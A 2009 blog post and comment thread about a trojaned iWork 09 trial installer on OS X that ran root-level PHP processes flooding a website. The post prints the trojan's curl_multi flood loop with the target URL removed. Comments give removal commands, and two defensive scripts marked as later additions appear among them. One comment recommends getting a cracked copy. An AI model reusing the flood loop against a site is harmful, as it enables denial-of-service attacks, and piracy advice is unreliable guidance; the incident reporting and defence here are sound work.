January 16, 2009
Hit by an OS X exploit
This morning I found a bunch of these processes chewing 100% CPU on my laptop (OS X 10.5.6):
php -r while(1){
    $mh = curl_multi_init(); $ch = array();
    for($i = 0; $i < 100; $i++){
        $ch[$i] = curl_init();
        curl_setopt($ch[$i], CURLOPT_URL, "http://...");
        curl_setopt($ch[$i], CURLOPT_HEADER, 0);
        curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
        curl_multi_add_handle($mh, $ch[$i]);
    }
    do{ curl_multi_exec($mh, $running); }
    while($running > 0);
    for($i = 0; $i < 100; $i++){ curl_multi_remove_handle($mh, $ch[$i]); }
    curl_multi_close($mh);
}
That’s a PHP script, running as root, and DoSing a website. (I've taken out the website URL, but it is one that has recently been under a documented DDoS attack.)
I'm still trying to work out how these got fired up. My machine was otherwise idle at the time they started. Unfortunately I didn’t capture the PPID, so I'm not sure what kicked them off.
If you see something similar, use ps -Alww to capture as much info about them as you can, and see if you can work out what triggered them.
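A triage helper for exactly this situation, added here as an example and not part of the original post. It reads ps -Alww output, picks out every process whose command line carries the curl_multi_init() loop, and prints each one's PID, its PPID and the parent's command line, so the parent is on record before anything gets killed. Column positions are read from the header line, so the same code works with the BSD-style ps on OS X and with procps on Linux. The embedded listing is a constructed sample; the PIDs in it and the /usr/bin/iWorkServices parent are assumptions for the demonstration, not data captured from the post.

```shell
#!/bin/sh
# Added example, not code from the original post. Finds the curl_multi loop
# processes in ps -Alww output and resolves their parent so the PPID is not lost.

# Constructed sample of ps -Alww output (abridged; not a real capture).
# The PIDs and the parent path are assumptions for the demonstration.
SAMPLE_PS='  UID   PID  PPID   F CPU PRI NI      SZ    RSS WCHAN     S     ADDR TTY           TIME CMD
    0     1     0   4   0  31  0  599816    172 -         Ss        0 ??         0:01.00 /sbin/launchd
    0  4201     1   4   0  31  0  599816    172 -         S         0 ??         0:00.02 /usr/bin/iWorkServices
    0  4211  4201   4  99  31  0  612000   5000 -         R         0 ??         5:12.40 php -r while(1){ $mh = curl_multi_init(); $ch = array(); ...
    0  4212  4201   4  99  31  0  612000   5000 -         R         0 ??         5:10.11 php -r while(1){ $mh = curl_multi_init(); $ch = array(); ...
  501   812     1   4   1  31  0  900000  40000 -         S         0 ??         0:40.00 /Applications/Safari.app/Contents/MacOS/Safari'

# Print "PID PPID" for every process whose line matches the regex in $1.
# ps output arrives on stdin; column numbers are taken from the header line.
match_procs() {
    awk -v pat="$1" '
        NR == 1 { for (i = 1; i <= NF; i++) col[$i] = i; next }
        $0 ~ pat { print $col["PID"], $col["PPID"] }'
}

# Print the full command line of the process whose PID is $1 (ps output on stdin).
cmd_of() {
    awk -v pid="$1" '
        NR == 1 { for (i = 1; i <= NF; i++) col[$i] = i; next }
        $col["PID"] == pid {
            s = $col["CMD"]
            for (i = col["CMD"] + 1; i <= NF; i++) s = s " " $i
            print s; exit
        }'
}

# One line per suspect process: pid, ppid and what the parent actually is.
# Reads ps output on stdin, so it runs on a live capture or on a saved file.
triage() {
    ps_out=$(cat)
    printf '%s\n' "$ps_out" | match_procs 'curl_multi_init' |
    while read -r pid ppid; do
        parent=$(printf '%s\n' "$ps_out" | cmd_of "$ppid")
        printf 'pid=%s ppid=%s parent=%s\n' "$pid" "$ppid" "$parent"
    done
}

# Usage:  sh triage.sh --live      (runs ps -Alww on this machine)
#         sh triage.sh --sample    (runs against the constructed listing above)
case "${1:-}" in
    --sample) printf '%s\n' "$SAMPLE_PS" | triage ;;
    --live)   ps -Alww | triage ;;
esac
```

Save the raw ps -Alww output to a file before killing anything; the parent may exit once its children are gone, and the file is what you will want when you come back to the question of what launched them.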
Update: And, thanks to Nathan de Vries, I know what triggered it.
root 94427 0.0 0.0 599816 172 ?? S 9Jan09 0:00.02 /Users/pete/Downloads/iWork.09/iWork09Trial.mpkg/Contents/Packages/iWorkServices.pkg/Contents/Resources/iworkservices
My copy of the iWork 09 trial installer contained a trojan.
This copy was passed to me through multiple hands. If I'd done the smart thing, and got my copy straight from Apple, I wouldn’t have had this problem.
At least I know it’s not a remote exploit! I'm still contemplating formatting and reinstalling. Who knows what else might be floating around?
I got hit by that trojan too, but since I'm in a foreign country, I don't have any backup; all my data is on my drive, so I'm not going to format it! Since it's not a virus, I don't really expect it to randomly modify my apps. I really think it was just a backdoor to DDoS some website and nothing more.
I had those php processes but I killed them as my fan was really noisy in the middle of the night. Now I have deleted every known piece. I will see in the future, but I really think nothing is going to happen (more than that, I mean).
does anyone know how to get rid of all the components without having to reformat?
If you had it, no telling what it could have done. From what I understand pretty much anything, it was running as root… I'd re-format no question.
You should be able to do the following to remove the trojan:
1) (open Terminal.app)
2) sudo su (enter password)
3) rm -r /System/Library/StartupItems/iWorkServices
4) rm /private/tmp/.iWorkServices
5) rm /usr/bin/iWorkServices
6) rm -r /Library/Receipts/iWorkServices.pkg
7) killall -9 iWorkServices
That being said, you can never be sure with these things so formatting is your best option if at all possible.
I was about to be as dumb as you were! Thanks for sharing your experience, I am now running to the Apple store to buy legal software as I normally do.
Would you be willing to share the URL of the website under attack? We are investigating a recent DDoS and suspect this may be related.
Don: You have email.
That script works great unless the trojan is smarter. sudo su is completely unnecessary and for safety’s sake you should always use full paths for everything. Even that isn’t a guarantee of course as a really good trojan could have installed a rootkit by now. Give them your password and you don’t own the house anymore. But full paths with sudo as a prefix (and not sudo) is your best shot.
—> (and not sudo su)
Oh – in the MacRumors/NdV method there’s of course a final 8th step. ‘exit’. ;) Cheers.
PS. We have tools to monitor installs but every system has find. And find can tell you everything that’s been modified on a system from time 1 to time 2. I really don’t understand why people don’t take advantage of this. Cheers again.
Find is a great thing to use Rick. But here’s the problem, in the average day my desktop has over 1000+ files that have been modified, more if I did heavy web browsing. It’s just not always possible to narrow that window enough…
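The find comparison Rick describes, written out as an added example (not code from the post or from either commenter). It records a baseline marker at time 1 and later lists every regular file modified after it, but only under the directories where something that wants to survive a reboot or keep running as root has to leave a trace, and it prunes cache and trash trees so the list stays short enough to read, which is Pete's objection. The directory list is an assumed set of OS X persistence locations (the StartupItems path comes from the removal steps above, the rest are standard launchd and binary directories); pass your own list to override it.

```shell
#!/bin/sh
# Added example, not code from the original post or its comments. Baseline-and-
# compare check with find, scoped to the places a persistent root-level process
# has to touch, with noisy subtrees pruned.

# Assumed default scan set for OS X; override by passing directories explicitly.
DEFAULT_DIRS='/System/Library/StartupItems /Library/StartupItems /Library/LaunchDaemons /Library/LaunchAgents /private/tmp /usr/bin /usr/local/bin'

# Record "time 1": an empty marker file whose mtime is the baseline.
mark_baseline() {
    touch "$1"
}

# List regular files under the given directories (default: DEFAULT_DIRS) whose
# mtime is later than the marker file $1. Subtrees named Caches, Cache or
# .Trash are pruned as noise. Unreadable directories are skipped silently.
changed_since() {
    ref=$1; shift
    if [ $# -eq 0 ]; then
        set -- $DEFAULT_DIRS
    fi
    find "$@" \( -name Caches -o -name Cache -o -name .Trash \) -prune -o \
         -type f -newer "$ref" -print 2>/dev/null | sort
}

# Show owner, mode and mtime for each listed path (one per stdin line).
# A root-owned executable that appeared in a startup directory deserves a look.
report() {
    while read -r f; do
        ls -ld "$f"
    done
}

# Usage:  sh changes.sh baseline /var/root/.baseline
#         sh changes.sh since /var/root/.baseline [DIR ...]
case "${1:-}" in
    baseline) mark_baseline "$2" ;;
    since)    shift; changed_since "$@" | report ;;
esac
```

Take the baseline right after a clean install, or immediately before installing anything you did not get from its publisher, and keep the marker somewhere an ordinary user cannot touch. The comparison only sees mtimes, so a process that resets timestamps or replaces find itself will not show up; that is the same limit Rick and Nathan put on the manual removal steps.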
Hey Pete
I am writing an article on the malware threat to Macs. If you have a moment or two, maybe I could ask you some questions by email? By the way, I'm aware it’s pretty late in Australia, so if you were planning on an early night, I understand. :–) Paul
get rid of it…https://isc.sans.org/diary.html?storyid=5743
FYI: SecureMac has released FREE iServices Trojan Removal Tool 1.1 (Formally known as iWorkServices Trojan Removal Tool 1.0) a free utility to assist with the removal of the OSX.Trojan.iServices.A and OSX.Trojan.iServices.B trojans distributed with pirated software. http://www.securemac.com/ http://macscan.securemac.com/files/iServicesTrojanRemovalTool.dmg
“since I'm in a foreign country, I don’t have any backup”
What does being in a foreign country have to do with backing up your data? Do foreign countries not believe in data protection?
I assume he means he’s currently in a foreign country and does not have access to his backups
A word of advice. If the processes were running under root then your box was "rooted" when you installed the software. There's no telling what it hid where. Reformatting is the ONLY! way to be sure your system is clean. Trojan Removal tools "may" work but you can't be totally sure. I don't care what their market hype has to say. Trojans can vary too easily and a "tool" can and will miss things sometimes. Sorry to be the bearer of bad news.
Can someone mention how you can check if you actually have this issue??
@Twixie: Rich’s URL gives simple, step-by-step detection (and basic removal) instructions, here:
https://isc.sans.org/diary.html?storyid=5743
I would like to point out that it does not really need to run as root. It does not really need to, especially if you have your user logged in 24/7, and basically all it does is access a URL. The very same could have been achieved using any other scripting language provided with the system (Python, Perl and maybe AppleScript, and of course shell scripts).
The “I'm not running as superuser so I should be fine no matter what” is quite a myth (although, not running as superuser is infinitely better than doing so like most WinXP installs) and sadly, some literature keeps on pushing it.
I think that in both the Mac and the Linux world there should be a general acknowledgement that the old days of “I'm not running Windows so I'm fine” are gone. Which means protecting better things like crontabs, autostart-applications (mostly in Desktop Environments), and install processes.
Well, if program installation requires an administrative password, one should be sure where the program is coming from and what it would do. Basically, "on the side" a developer could make the system run anything besides the intended program after it was installed with the password, and it doesn't have to be a rootkit. Some programs use the sudoers delay to attach to the system. Set it to zero and you'll be fine. Mac OS has beautiful tools that come with the system, handy for developers to use: Perl, PHP, AppleScript, bash, curl etc., as do many other Unix systems. I have been a Mac switcher for 5 years, never had an issue so far. I wrote a daemon that sniffs for processes; it did not catch anything yet, but one would never know.
I would have to concur with the other posters in this forum that state that the only way to be 100% sure that your system is free of any compromise is to perform a complete reformat and reinstall. Once a system has been compromised, especially with root privs, there is no assured degree of confidence that any and all the components have been removed short of a redo. There are simply too many little nooks and crannies that malware can hide undetected. Certainly you could try and suss out all suspect files and folders using find or whatever, but the time and effort you would put into this would likely be considerably more than a complete reinstall.
By the looks of the script, this particular trojan doesn’t seem too sophisticated, so chances are it’s probably as straightforward as it seems to remove, but you can never be too certain. A really good trojan would have a rootkit installed and be merrily owning your box without you ever suspecting a thing.
If you ever want any confidence in your system again, just reinstall and be done with it. Oh, and stop pirating software! ;–)
Guess you were using a cracked copy of iWork.. :)
@Adam: “I love it, a tiny little trojan and you people are talking about formatting your macs. If I had to reformat every infected PC I ran into I would be doing rebuilds all day everyday. ”
Well, if you have any sort of malware running with unrestricted privileges on any platform, trying to recover by just removing what you can find is risky. If the answer to the question “what could the trojan have changed?” is “anything” and you have no trustworthy way to answer “what DID the trojan change?” then just killing the parts you can easily see may be leaving parts in place that can rebuild the full trojan later. The term “rootkit” originated on Unix to describe packages that included self-hiding replacements of core utilities and libraries, but these days it is almost exclusively used to refer to Windows malware that uses Windows misfeatures to hide itself.
That’s the reason why I buy my software as I do it with my hardware too. ;–)
The more Apple pushes OS X into the regular consumer space, the more we will get this kind of news, because it will be more and more interesting for the aggressors to take over OS X systems.
That is no exploit, it’s your own fault. Next time buy the software legally and install a virus scanner.
But nice discovery!
Just to be clear, the infected iWork trial installer was identical (trojan excepted) to the iWork trial installer available for free from Apple’s web site. It was not a copy of the retail version, and it was not cracked.
(That said, redistributing even the free trial installer is probably against Apple’s license terms.)
Is a PHP script sort of the same as an AppleScript?
Here’s how to prevent this kind of attack: take a note from Microsoft Vista, and never give admin privileges to any exe that isn’t digitally signed by a trusted entity.
Apple would do well for Mac fans and imitate Microsoft in this way.
If I remember correctly you’ll just want to snatch the pls and replace your trial copies with the *acked version available for download. It works. May have to research it more on Google – look 3 or so weeks back from last Sat.
It's not a remote exploit, it's much worse: a dedicated hacker owning your box and launching DDoS from it!
I guess it might be a good time to invest in anti-virus for Mac!
This attempt at releasing a bot has been somewhat successful. I have two different versions of this running on my machine right now. I emulated and partitioned a section of my drive to replicate on another machine using a faux proxy server. I also have rerouted the default web address to an internal web address and, I am happy to say, I'm watching the lil fella work haha!
Unfortunately, it may not be enough to just reformat. Has anyone else had any luck on uncovering any other information about this one?
@AstroChimp —> Your name is well chosen. Unix-like systems such as OS X, Linux, FreeBSD, etc. have always required direct user action in order to run an executable with root privs. Matter of fact, many ‘nix systems go so far as to require a file downloaded from anywhere to be explicitly made executable before it will even run it. Microsoft has only just now caught on to this and implemented it with Vista some 20+ years later. This is why it has always been emphasized to never run as root to avoid having a rampant process or bad executable from doing systemic damage.
The more popular an operating system like OS X gets, the more attractive it becomes to hackers. Keep up your computer security, especially with OS X: it won't get better!
Just like Nico says, the growing popularity of OS X, especially in the expert’s scene, invites these blackhat smallheads to publish exploits and other hated stuff. I bet when the new Google OS will be launched, it won’t take long to be attacked by several guys “who don’t have other things to do than damaging other people”…
I agree 100% with Webdesign Berlin Fachmann.
@Webdesign Berlin Fachmann Maybe you're right; I hope it will not be too easy for them to damage anything, but probably this problem will always exist.
Reading this far too late. I downloaded the iWork trial from the Apple site. I had the family pack of iWork/iLife on order but I could not wait. When I attempted to do the install I had problems and had to delete the trial. My computer was new and I made frequent complaints to Apple and Intego that my computer was compromised. In October I discovered that my computer was remotely controlled. Apple support treated me like dirt after that. Ultimately, after my threats, Apple replaced my premier MacBook Pro in late November. Since it did not match up to my other Mac I have yet to open the box. I believed this to be a part of the Java problem. Has anyone else indicated that they downloaded from the Apple site?
I've never heard reports of anyone getting a virus or malware from any installer supplied directly by Apple, and I'd be very surprised if that ever happened.
I'm also not sure what you mean by “the java problem”?
OSX Java Threat CVE-2008-5353
Oh yeah, I remember that one. It’s nothing to do with the issue discussed in this blog post though.
I followed a link from MacWorld. It sounded so exactly like the scenario I discovered on my laptop. Just made me wonder. Either way I had a java host on my system using every possible method of exporting info.
That is one of the reasons why Apple introduced the Mac App Store. Because the number of sold Macs is rising constantly, OSX will have to deal with exploits more often in the future.
Shit happens :0)